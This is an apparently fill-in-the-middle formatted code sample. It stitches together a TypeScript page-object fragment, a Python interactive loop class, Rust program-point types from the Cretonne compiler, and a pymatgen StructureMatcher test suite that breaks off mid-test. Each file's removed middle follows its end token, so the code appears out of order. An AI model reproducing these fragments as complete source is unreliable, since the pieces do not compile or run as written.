return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.ProfessionalUrl });
}
getResearchBackgroundTextarea(): Textarea {
return Textarea.findByName(this.page, { normalizeSpace: LabelAlias.ResearchBackground });
}
getAddress1Input(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Address1 });
}
getAddress2Input(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Address2 });
}
getCityInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.City });
}
getStateInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.State });
}
getZipCodeInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Zip });
}
getCountryInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Country });
}
getSaveProfileButton(): Button {
return Button.findByName(this.page, { name: LabelAlias.SaveProfile });
}
async needsConfirmation(): Promise<boolean> {
return await this.containsText(LabelAlias.NeedsConfirmation);
}
getLooksGoodLink(): Link {
return Link.findByName(this.page, { name: LabelAlias.LooksGood });
}
}<|fim▁end|> | Address1: 'streetAddress1',
Address2: 'streetAddress2',
City: 'city', |
<|file_name|>loopapp.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):<|fim▁hole|>
super(InteractiveLoopApplication, self).__init__(
name, desc, version, padding, margin, suffix, encoding)
# loop status
self.STATUS_EXIT = 0
self.STATUS_CONTINUE = 1
def loop(self, func):
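# Wraps func in a main loop: keep calling func() while it returns
# STATUS_CONTINUE; stop on STATUS_EXIT or Ctrl-C (KeyboardInterrupt).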
def mainloop():
loop_flag = self.STATUS_CONTINUE
while loop_flag == self.STATUS_CONTINUE:
try:
loop_flag = func()
except KeyboardInterrupt:
self.write_error("Terminated.")
self.exit(0)
self.exit(0)
return mainloop<|fim▁end|> |
def __init__(self, name, desc, version,
padding, margin, suffix, encoding=ENCODING): |
<|file_name|>progpoint.rs<|end_file_name|><|fim▁begin|>//! Program points.
use entity::EntityRef;
use ir::{Ebb, Inst, ValueDef};
use std::fmt;
use std::u32;
use std::cmp;
/// A `ProgramPoint` represents a position in a function where the live range of an SSA value can
/// begin or end. It can be either:
///
/// 1. An instruction or
/// 2. An EBB header.
///
/// This corresponds more or less to the lines in the textual representation of Cretonne IL.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct ProgramPoint(u32);
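// Packed encoding: an `Inst` is stored as `index * 2` (even) and an `Ebb`
// header as `index * 2 + 1` (odd); the low bit recovers the variant in
// `From<ProgramPoint> for ExpandedProgramPoint` below.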
impl From<Inst> for ProgramPoint {
fn from(inst: Inst) -> ProgramPoint {
let idx = inst.index();
debug_assert!(idx < (u32::MAX / 2) as usize);
ProgramPoint((idx * 2) as u32)
}
}
impl From<Ebb> for ProgramPoint {
fn from(ebb: Ebb) -> ProgramPoint {
let idx = ebb.index();
debug_assert!(idx < (u32::MAX / 2) as usize);
ProgramPoint((idx * 2 + 1) as u32)
}
}
impl From<ValueDef> for ProgramPoint {
fn from(def: ValueDef) -> ProgramPoint {
match def {
ValueDef::Result(inst, _) => inst.into(),
ValueDef::Param(ebb, _) => ebb.into(),
}
}
}
/// An expanded program point directly exposes the variants, but takes twice the space to
/// represent.
#[derive(PartialEq, Eq, Clone, Copy)]
pub enum ExpandedProgramPoint {
/// An instruction in the function.
Inst(Inst),
/// An EBB header.
Ebb(Ebb),
}
impl ExpandedProgramPoint {
/// Get the instruction we know is inside.
pub fn unwrap_inst(self) -> Inst {
match self {
ExpandedProgramPoint::Inst(x) => x,
ExpandedProgramPoint::Ebb(x) => panic!("expected inst: {}", x),
}
}
}
impl From<Inst> for ExpandedProgramPoint {
fn from(inst: Inst) -> ExpandedProgramPoint {
ExpandedProgramPoint::Inst(inst)
}
}
impl From<Ebb> for ExpandedProgramPoint {
fn from(ebb: Ebb) -> ExpandedProgramPoint {
ExpandedProgramPoint::Ebb(ebb)
}
}
impl From<ValueDef> for ExpandedProgramPoint {
fn from(def: ValueDef) -> ExpandedProgramPoint {
match def {
ValueDef::Result(inst, _) => inst.into(),
ValueDef::Param(ebb, _) => ebb.into(),
}
}
}
impl From<ProgramPoint> for ExpandedProgramPoint {
fn from(pp: ProgramPoint) -> ExpandedProgramPoint {
if pp.0 & 1 == 0 {
ExpandedProgramPoint::Inst(Inst::new((pp.0 / 2) as usize))
} else {
ExpandedProgramPoint::Ebb(Ebb::new((pp.0 / 2) as usize))
}
}
}
impl fmt::Display for ExpandedProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match *self {
ExpandedProgramPoint::Inst(x) => write!(f, "{}", x),
ExpandedProgramPoint::Ebb(x) => write!(f, "{}", x),
}
}
}
impl fmt::Display for ProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let epp: ExpandedProgramPoint = (*self).into();
epp.fmt(f)
}
}
impl fmt::Debug for ExpandedProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "ExpandedProgramPoint({})", self)
}
}
impl fmt::Debug for ProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "ProgramPoint({})", self)
}
}
/// Context for ordering program points.
///
/// `ProgramPoint` objects don't carry enough information to be ordered independently, they need a
/// context providing the program order.
pub trait ProgramOrder {
/// Compare the program points `a` and `b` relative to this program order.
///
/// Return `Less` if `a` appears in the program before `b`.
///
/// This is declared as a generic such that it can be called with `Inst` and `Ebb` arguments
/// directly. Depending on the implementation, there is a good chance performance will be
/// improved for those cases where the type of either argument is known statically.
fn cmp<A, B>(&self, a: A, b: B) -> cmp::Ordering
where
A: Into<ExpandedProgramPoint>,
B: Into<ExpandedProgramPoint>;
/// Is the range from `inst` to `ebb` just the gap between consecutive EBBs?
///
/// This returns true if `inst` is the terminator in the EBB immediately before `ebb`.
fn is_ebb_gap(&self, inst: Inst, ebb: Ebb) -> bool;
}
#[cfg(test)]
mod tests {
use super::*;
use entity::EntityRef;
use ir::{Inst, Ebb};
use std::string::ToString;
#[test]
fn convert() {
let i5 = Inst::new(5);
let b3 = Ebb::new(3);
let pp1: ProgramPoint = i5.into();
let pp2: ProgramPoint = b3.into();
assert_eq!(pp1.to_string(), "inst5");
assert_eq!(pp2.to_string(), "ebb3");<|fim▁hole|>}<|fim▁end|> | } |
<|file_name|>test_structure_matcher.py<|end_file_name|><|fim▁begin|># coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import itertools
import json
import os
import unittest
import numpy as np
from monty.json import MontyDecoder
from pymatgen.core.periodic_table import Element
from pymatgen.core.lattice import Lattice
from pymatgen.core.structure import Structure
from pymatgen.analysis.defects.core import Interstitial, Substitution, Vacancy
from pymatgen.analysis.structure_matcher import (
ElementComparator,
FrameworkComparator,
OccupancyComparator,
OrderDisorderElementComparator,
PointDefectComparator,
StructureMatcher,
)
from pymatgen.core import PeriodicSite
from pymatgen.core.operations import SymmOp
from pymatgen.util.coord import find_in_coord_list_pbc
from pymatgen.util.testing import PymatgenTest
class StructureMatcherTest(PymatgenTest):
_multiprocess_shared_ = True
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "TiO2_entries.json"), "r") as fp:
entries = json.load(fp, cls=MontyDecoder)
self.struct_list = [e.structure for e in entries]
self.oxi_structs = [
self.get_structure("Li2O"),
Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR.Li2O")),
]
def test_ignore_species(self):
s1 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "LiFePO4.cif"))
s2 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
m = StructureMatcher(ignored_species=["Li"], primitive_cell=False, attempt_supercell=True)
self.assertTrue(m.fit(s1, s2))
self.assertTrue(m.fit_anonymous(s1, s2))
groups = m.group_structures([s1, s2])
self.assertEqual(len(groups), 1)
s2.make_supercell((2, 1, 1))
ss1 = m.get_s2_like_s1(s2, s1, include_ignored_species=True)
self.assertAlmostEqual(ss1.lattice.a, 20.820740000000001)
self.assertEqual(ss1.composition.reduced_formula, "LiFePO4")
self.assertEqual(
{k.symbol: v.symbol for k, v in m.get_best_electronegativity_anonymous_mapping(s1, s2).items()},
{"Fe": "Fe", "P": "P", "O": "O"},
)
def test_get_supercell_size(self):
l = Lattice.cubic(1)
l2 = Lattice.cubic(0.9)
s1 = Structure(l, ["Mg", "Cu", "Ag", "Cu", "Ag"], [[0] * 3] * 5)
s2 = Structure(l2, ["Cu", "Cu", "Ag"], [[0] * 3] * 3)
sm = StructureMatcher(supercell_size="volume")
self.assertEqual(sm._get_supercell_size(s1, s2), (1, True))
self.assertEqual(sm._get_supercell_size(s2, s1), (1, True))
sm = StructureMatcher(supercell_size="num_sites")
self.assertEqual(sm._get_supercell_size(s1, s2), (2, False))
self.assertEqual(sm._get_supercell_size(s2, s1), (2, True))
sm = StructureMatcher(supercell_size="Ag")
self.assertEqual(sm._get_supercell_size(s1, s2), (2, False))
self.assertEqual(sm._get_supercell_size(s2, s1), (2, True))
sm = StructureMatcher(supercell_size=["Ag", "Cu"])
self.assertEqual(sm._get_supercell_size(s1, s2), (1, True))
self.assertEqual(sm._get_supercell_size(s2, s1), (1, True))
sm = StructureMatcher(supercell_size="wfieoh")
self.assertRaises(ValueError, sm._get_supercell_size, s1, s2)
def test_cmp_fstruct(self):
sm = StructureMatcher()
s1 = np.array([[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]])
s2 = np.array([[0.11, 0.22, 0.33]])
frac_tol = np.array([0.02, 0.03, 0.04])
mask = np.array([[False, False]])
mask2 = np.array([[True, False]])
self.assertRaises(ValueError, sm._cmp_fstruct, s2, s1, frac_tol, mask.T)
self.assertRaises(ValueError, sm._cmp_fstruct, s1, s2, frac_tol, mask.T)
self.assertTrue(sm._cmp_fstruct(s1, s2, frac_tol, mask))
self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol / 2, mask))
self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol, mask2))
def test_cart_dists(self):
sm = StructureMatcher()
l = Lattice.orthorhombic(1, 2, 3)
s1 = np.array([[0.13, 0.25, 0.37], [0.1, 0.2, 0.3]])
s2 = np.array([[0.11, 0.22, 0.33]])
s3 = np.array([[0.1, 0.2, 0.3], [0.11, 0.2, 0.3]])
s4 = np.array([[0.1, 0.2, 0.3], [0.1, 0.6, 0.7]])
mask = np.array([[False, False]])
mask2 = np.array([[False, True]])
mask3 = np.array([[False, False], [False, False]])
mask4 = np.array([[False, True], [False, True]])
n1 = (len(s1) / l.volume) ** (1 / 3)
n2 = (len(s2) / l.volume) ** (1 / 3)
self.assertRaises(ValueError, sm._cart_dists, s2, s1, l, mask.T, n2)
self.assertRaises(ValueError, sm._cart_dists, s1, s2, l, mask.T, n1)
d, ft, s = sm._cart_dists(s1, s2, l, mask, n1)
self.assertTrue(np.allclose(d, [0]))
self.assertTrue(np.allclose(ft, [-0.01, -0.02, -0.03]))
self.assertTrue(np.allclose(s, [1]))
# check that masking best value works
d, ft, s = sm._cart_dists(s1, s2, l, mask2, n1)
self.assertTrue(np.allclose(d, [0]))
self.assertTrue(np.allclose(ft, [0.02, 0.03, 0.04]))
self.assertTrue(np.allclose(s, [0]))
# check that averaging of translation is done properly
d, ft, s = sm._cart_dists(s1, s3, l, mask3, n1)
self.assertTrue(np.allclose(d, [0.08093341] * 2))
self.assertTrue(np.allclose(ft, [0.01, 0.025, 0.035]))
self.assertTrue(np.allclose(s, [1, 0]))
# check distances are large when mask allows no 'real' mapping
d, ft, s = sm._cart_dists(s1, s4, l, mask4, n1)
self.assertTrue(np.min(d) > 1e8)
self.assertTrue(np.min(ft) > 1e8)
def test_get_mask(self):
sm = StructureMatcher(comparator=ElementComparator())
l = Lattice.cubic(1)
s1 = Structure(l, ["Mg", "Cu", "Ag", "Cu"], [[0] * 3] * 4)
s2 = Structure(l, ["Cu", "Cu", "Ag"], [[0] * 3] * 3)
result = [
[True, False, True, False],
[True, False, True, False],
[True, True, False, True],
]
m, inds, i = sm._get_mask(s1, s2, 1, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 2)
self.assertEqual(inds, [2])
# test supercell with match
result = [
[1, 1, 0, 0, 1, 1, 0, 0],
[1, 1, 0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 0, 0, 1, 1],
]
m, inds, i = sm._get_mask(s1, s2, 2, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 2)
self.assertTrue(np.allclose(inds, np.array([4])))
# test supercell without match
result = [
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1],
]
m, inds, i = sm._get_mask(s2, s1, 2, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 0)
self.assertTrue(np.allclose(inds, np.array([])))
# test s2_supercell
result = [
[1, 1, 1],
[1, 1, 1],
[0, 0, 1],
[0, 0, 1],
[1, 1, 0],
[1, 1, 0],
[0, 0, 1],
[0, 0, 1],
]
m, inds, i = sm._get_mask(s2, s1, 2, False)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 0)
self.assertTrue(np.allclose(inds, np.array([])))
# test for multiple translation indices
s1 = Structure(l, ["Cu", "Ag", "Cu", "Ag", "Ag"], [[0] * 3] * 5)
s2 = Structure(l, ["Ag", "Cu", "Ag"], [[0] * 3] * 3)
result = [[1, 0, 1, 0, 0], [0, 1, 0, 1, 1], [1, 0, 1, 0, 0]]
m, inds, i = sm._get_mask(s1, s2, 1, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 1)
self.assertTrue(np.allclose(inds, [0, 2]))
def test_get_supercells(self):
sm = StructureMatcher(comparator=ElementComparator())
l = Lattice.cubic(1)
l2 = Lattice.cubic(0.5)
s1 = Structure(l, ["Mg", "Cu", "Ag", "Cu"], [[0] * 3] * 4)
s2 = Structure(l2, ["Cu", "Cu", "Ag"], [[0] * 3] * 3)
scs = list(sm._get_supercells(s1, s2, 8, False))
for x in scs:
self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)
self.assertEqual(len(x[0]), 4)
self.assertEqual(len(x[1]), 24)
self.assertEqual(len(scs), 48)
scs = list(sm._get_supercells(s2, s1, 8, True))
for x in scs:
self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)
self.assertEqual(len(x[0]), 24)
self.assertEqual(len(x[1]), 4)
self.assertEqual(len(scs), 48)
def test_fit(self):
"""
Take two known matched structures
1) Ensure match
2) Ensure match after translation and rotations
3) Ensure no-match after large site translation
4) Ensure match after site shuffling
"""
sm = StructureMatcher()
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
# Test rotational/translational invariance
op = SymmOp.from_axis_angle_and_translation([0, 0, 1], 30, False, np.array([0.4, 0.7, 0.9]))
self.struct_list[1].apply_operation(op)
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
# Test failure under large atomic translation
self.struct_list[1].translate_sites([0], [0.4, 0.4, 0.2], frac_coords=True)
self.assertFalse(sm.fit(self.struct_list[0], self.struct_list[1]))
self.struct_list[1].translate_sites([0], [-0.4, -0.4, -0.2], frac_coords=True)
# random.shuffle(editor._sites)
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
# Test FrameworkComparator
sm2 = StructureMatcher(comparator=FrameworkComparator())
lfp = self.get_structure("LiFePO4")
nfp = self.get_structure("NaFePO4")
self.assertTrue(sm2.fit(lfp, nfp))
self.assertFalse(sm.fit(lfp, nfp))
# Test anonymous fit.
self.assertEqual(sm.fit_anonymous(lfp, nfp), True)
self.assertAlmostEqual(sm.get_rms_anonymous(lfp, nfp)[0], 0.060895871160262717)
# Test partial occupancies.
s1 = Structure(
Lattice.cubic(3),
[{"Fe": 0.5}, {"Fe": 0.5}, {"Fe": 0.5}, {"Fe": 0.5}],
[[0, 0, 0], [0.25, 0.25, 0.25], [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]],
)
s2 = Structure(
Lattice.cubic(3),
[{"Fe": 0.25}, {"Fe": 0.5}, {"Fe": 0.5}, {"Fe": 0.75}],
[[0, 0, 0], [0.25, 0.25, 0.25], [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]],
)
self.assertFalse(sm.fit(s1, s2))
self.assertFalse(sm.fit(s2, s1))
s2 = Structure(
Lattice.cubic(3),
[{"Mn": 0.5}, {"Mn": 0.5}, {"Mn": 0.5}, {"Mn": 0.5}],
[[0, 0, 0], [0.25, 0.25, 0.25], [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]],
)
self.assertEqual(sm.fit_anonymous(s1, s2), True)
self.assertAlmostEqual(sm.get_rms_anonymous(s1, s2)[0], 0)
# test symmetric
sm_coarse = StructureMatcher(
comparator=ElementComparator(),
ltol=0.6,
stol=0.6,
angle_tol=6,
)
s1 = Structure.from_file(PymatgenTest.TEST_FILES_DIR / "fit_symm_s1.vasp")
s2 = Structure.from_file(PymatgenTest.TEST_FILES_DIR / "fit_symm_s2.vasp")
self.assertEqual(sm_coarse.fit(s1, s2), True)
self.assertEqual(sm_coarse.fit(s2, s1), False)
self.assertEqual(sm_coarse.fit(s1, s2, symmetric=True), False)
self.assertEqual(sm_coarse.fit(s2, s1, symmetric=True), False)
def test_oxi(self):
"""Test oxidation state removal matching"""
sm = StructureMatcher()
self.assertFalse(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))
sm = StructureMatcher(comparator=ElementComparator())
self.assertTrue(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))
def test_primitive(self):
"""Test primitive cell reduction"""
sm = StructureMatcher(primitive_cell=True)
self.struct_list[1].make_supercell([[2, 0, 0], [0, 3, 0], [0, 0, 1]])
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
def test_class(self):
# Tests entire class as single working unit
sm = StructureMatcher()
# Test group_structures and find_indices
out = sm.group_structures(self.struct_list)
self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])
self.assertEqual(sum(map(len, out)), len(self.struct_list))
for s in self.struct_list[::2]:
s.replace_species({"Ti": "Zr", "O": "Ti"})
out = sm.group_structures(self.struct_list, anonymous=True)
self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])
def test_mix(self):
structures = [
self.get_structure("Li2O"),
self.get_structure("Li2O2"),
self.get_structure("LiFePO4"),
]
for fname in ["POSCAR.Li2O", "POSCAR.LiFePO4"]:
structures.append(Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, fname)))
sm = StructureMatcher(comparator=ElementComparator())
groups = sm.group_structures(structures)
for g in groups:
formula = g[0].composition.reduced_formula
if formula in ["Li2O", "LiFePO4"]:
self.assertEqual(len(g), 2)
else:
self.assertEqual(len(g), 1)
def test_left_handed_lattice(self):
"""Ensure Left handed lattices are accepted"""
sm = StructureMatcher()
s = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Li3GaPCO7.json"))
self.assertTrue(sm.fit(s, s))
def test_as_dict_and_from_dict(self):
sm = StructureMatcher(
ltol=0.1,
stol=0.2,
angle_tol=2,
primitive_cell=False,
scale=False,
comparator=FrameworkComparator(),
)
d = sm.as_dict()
sm2 = StructureMatcher.from_dict(d)
self.assertEqual(sm2.as_dict(), d)
def test_no_scaling(self):
sm = StructureMatcher(ltol=0.1, stol=0.1, angle_tol=2, scale=False, comparator=ElementComparator())
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
self.assertTrue(sm.get_rms_dist(self.struct_list[0], self.struct_list[1])[0] < 0.0008)
def test_supercell_fit(self):
sm = StructureMatcher(attempt_supercell=False)
s1 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Al3F9.json"))
s2 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Al3F9_distorted.json"))
self.assertFalse(sm.fit(s1, s2))
sm = StructureMatcher(attempt_supercell=True)
self.assertTrue(sm.fit(s1, s2))
self.assertTrue(sm.fit(s2, s1))
def test_get_lattices(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=True,
scale=True,
attempt_supercell=False,
)
l1 = Lattice.from_parameters(1, 2.1, 1.9, 90, 89, 91)
l2 = Lattice.from_parameters(1.1, 2, 2, 89, 91, 90)
s1 = Structure(l1, [], [])
s2 = Structure(l2, [], [])
lattices = list(sm._get_lattices(s=s1, target_lattice=s2.lattice))
self.assertEqual(len(lattices), 16)
l3 = Lattice.from_parameters(1.1, 2, 20, 89, 91, 90)
s3 = Structure(l3, [], [])
lattices = list(sm._get_lattices(s=s1, target_lattice=s3.lattice))
self.assertEqual(len(lattices), 0)
def test_find_match1(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=True,
scale=True,
attempt_supercell=False,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, 0], [0, 0.1, -0.95], [0.7, 0.5, 0.375]])
s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)
match = sm._strict_match(s1, s2, fu, s1_supercell=True, use_rms=True, break_on_match=False)
scale_matrix = match[2]
s2.make_supercell(scale_matrix)
fc = s2.frac_coords + match[3]
fc -= np.round(fc)
self.assertAlmostEqual(np.sum(fc), 0.9)
self.assertAlmostEqual(np.sum(fc[:, :2]), 0.1)
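# match[1] holds site distances normalized by (vol / nsites) ** (1 / 3);
# multiplying by that length scale recovers the Cartesian distances.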
cart_dist = np.sum(match[1] * (l.volume / 3) ** (1 / 3))
self.assertAlmostEqual(cart_dist, 0.15)
def test_find_match2(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=True,
scale=True,
attempt_supercell=False,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Si", "Si"], [[0, 0, 0.1], [0, 0, 0.2]])
s2 = Structure(l, ["Si", "Si"], [[0, 0.1, 0], [0, 0.1, -0.95]])
s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)
match = sm._strict_match(s1, s2, fu, s1_supercell=False, use_rms=True, break_on_match=False)
scale_matrix = match[2]
s2.make_supercell(scale_matrix)
s2.translate_sites(range(len(s2)), match[3])
self.assertAlmostEqual(np.sum(s2.frac_coords) % 1, 0.3)
self.assertAlmostEqual(np.sum(s2.frac_coords[:, :2]) % 1, 0)
def test_supercell_subsets(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="volume",
)
sm_no_s = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=False,
supercell_size="volume",
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Ag", "Si", "Si"], [[0.7, 0.4, 0.5], [0, 0, 0.1], [0, 0, 0.2]])
s1.make_supercell([2, 1, 1])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, -0.95], [0, 0.1, 0], [-0.7, 0.5, 0.375]])
shuffle = [0, 2, 1, 3, 4, 5]
s1 = Structure.from_sites([s1[i] for i in shuffle])
# test when s1 is exact supercell of s2
result = sm.get_s2_like_s1(s1, s2)
for a, b in zip(s1, result):
self.assertTrue(a.distance(b) < 0.08)
self.assertEqual(a.species, b.species)
self.assertTrue(sm.fit(s1, s2))
self.assertTrue(sm.fit(s2, s1))
self.assertTrue(sm_no_s.fit(s1, s2))
self.assertTrue(sm_no_s.fit(s2, s1))
rms = (0.048604032430991401, 0.059527539448807391)
self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2), rms))
self.assertTrue(np.allclose(sm.get_rms_dist(s2, s1), rms))
# test when the supercell is a subset of s2
subset_supercell = s1.copy()
del subset_supercell[0]
result = sm.get_s2_like_s1(subset_supercell, s2)
self.assertEqual(len(result), 6)
for a, b in zip(subset_supercell, result):
self.assertTrue(a.distance(b) < 0.08)
self.assertEqual(a.species, b.species)
self.assertTrue(sm.fit(subset_supercell, s2))
self.assertTrue(sm.fit(s2, subset_supercell))
self.assertFalse(sm_no_s.fit(subset_supercell, s2))
self.assertFalse(sm_no_s.fit(s2, subset_supercell))
rms = (0.053243049896333279, 0.059527539448807336)
self.assertTrue(np.allclose(sm.get_rms_dist(subset_supercell, s2), rms))
self.assertTrue(np.allclose(sm.get_rms_dist(s2, subset_supercell), rms))
# test when s2 (once made a supercell) is a subset of s1
s2_missing_site = s2.copy()
del s2_missing_site[1]
result = sm.get_s2_like_s1(s1, s2_missing_site)
for a, b in zip((s1[i] for i in (0, 2, 4, 5)), result):
self.assertTrue(a.distance(b) < 0.08)
self.assertEqual(a.species, b.species)
self.assertTrue(sm.fit(s1, s2_missing_site))
self.assertTrue(sm.fit(s2_missing_site, s1))
self.assertFalse(sm_no_s.fit(s1, s2_missing_site))
self.assertFalse(sm_no_s.fit(s2_missing_site, s1))
rms = (0.029763769724403633, 0.029763769724403987)
self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2_missing_site), rms))
self.assertTrue(np.allclose(sm.get_rms_dist(s2_missing_site, s1), rms))
def test_get_s2_large_s2(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=False,
attempt_supercell=True,
allow_subset=False,
supercell_size="volume",
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Ag", "Si", "Si"], [[0.7, 0.4, 0.5], [0, 0, 0.1], [0, 0, 0.2]])
l2 = Lattice.orthorhombic(1.01, 2.01, 3.01)
s2 = Structure(l2, ["Si", "Si", "Ag"], [[0, 0.1, -0.95], [0, 0.1, 0], [-0.7, 0.5, 0.375]])
s2.make_supercell([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
result = sm.get_s2_like_s1(s1, s2)
for x, y in zip(s1, result):
self.assertLess(x.distance(y), 0.08)
def test_get_mapping(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=False,
allow_subset=True,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Ag", "Si", "Si"], [[0.7, 0.4, 0.5], [0, 0, 0.1], [0, 0, 0.2]])
s1.make_supercell([2, 1, 1])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, -0.95], [0, 0.1, 0], [-0.7, 0.5, 0.375]])
shuffle = [2, 0, 1, 3, 5, 4]
s1 = Structure.from_sites([s1[i] for i in shuffle])
# test the mapping
s2.make_supercell([2, 1, 1])
# equal sizes
for i, x in enumerate(sm.get_mapping(s1, s2)):
self.assertEqual(s1[x].species, s2[i].species)
del s1[0]
# s1 is subset of s2
for i, x in enumerate(sm.get_mapping(s2, s1)):
self.assertEqual(s1[i].species, s2[x].species)
# s2 is smaller than s1
del s2[0]
del s2[1]
self.assertRaises(ValueError, sm.get_mapping, s2, s1)
def test_get_supercell_matrix(self):
sm = StructureMatcher(
ltol=0.1,
stol=0.3,
angle_tol=2,
primitive_cell=False,
scale=True,
attempt_supercell=True,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s1.make_supercell([2, 1, 1])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, 0], [0, 0.1, -0.95], [-0.7, 0.5, 0.375]])
result = sm.get_supercell_matrix(s1, s2)
self.assertTrue((result == [[-2, 0, 0], [0, 1, 0], [0, 0, 1]]).all())
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s1.make_supercell([[1, -1, 0], [0, 0, -1], [0, 1, 0]])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, 0], [0, 0.1, -0.95], [-0.7, 0.5, 0.375]])
result = sm.get_supercell_matrix(s1, s2)
self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())
# test when the supercell is a subset
sm = StructureMatcher(
ltol=0.1,
stol=0.3,
angle_tol=2,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
)
del s1[0]
result = sm.get_supercell_matrix(s1, s2)
self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())
def test_subset(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=False,
allow_subset=True,
)
l = Lattice.orthorhombic(10, 20, 30)
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Ag"], [[0, 0.1, 0], [-0.7, 0.5, 0.4]])
result = sm.get_s2_like_s1(s1, s2)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0, 0, 0.1])), 1)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0.7, 0.4, 0.5])), 1)
# test with fewer species in s2
s1 = Structure(l, ["Si", "Ag", "Si"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Si"], [[0, 0.1, 0], [-0.7, 0.5, 0.4]])
